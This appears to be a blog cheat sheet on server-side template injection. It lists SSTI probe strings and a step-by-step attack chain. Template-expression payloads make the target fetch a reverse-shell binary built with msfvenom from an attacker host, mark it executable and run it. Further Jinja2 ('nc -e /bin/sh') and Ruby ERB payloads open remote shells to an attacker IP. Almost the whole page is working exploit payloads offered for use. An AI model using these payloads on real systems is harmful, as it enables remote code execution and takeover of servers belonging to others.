← Back to Blog

Server-Side Template Injection (SSTI)

Type: Technical Notes Category: Web Exploitation
SSTI Web RCE Jinja2 Template Engines

Payload Box - SSTI Payloads

Common Test Cases

{7*7}

{{7*7}}'

a{{bar}}b

{var} ${var} {{var}} <%var%> [% var %]

Example Attack Overview

Step 1: Start Local Server

python3 -m http.server 80

Step 2: Test Remote Connectivity (Java)

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://ip")}

Step 3: Create Reverse Shell Payload

msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=5010 -f elf > r.elf

nc -lvnp 443

Step 4: Perform SSTI for RCE

Download payload:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("wget 10.5.0.2:5003/r.elf")}

Make executable:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("chmod 777 ./r.elf")}

Execute:

*{"".getClass().forName("java.lang.Runtime").getRuntime().exec("./r.elf")}

Alternative Payloads

Python/Jinja2 (os.system):

*{os.system("nc -e /bin/sh ip 5010")}

Ruby ERB:

<%=system("ruby%20-rsocket%20-e%27spawn%28%22sh%22%2C%5B%3Ain%2C%3Aout%2C%3Aerr%5D%3D%3ETCPSocket.new%28%22IP%22%2C5007%29%29%27")%>

Tools

  • sstimap - Automated SSTI detection and exploitation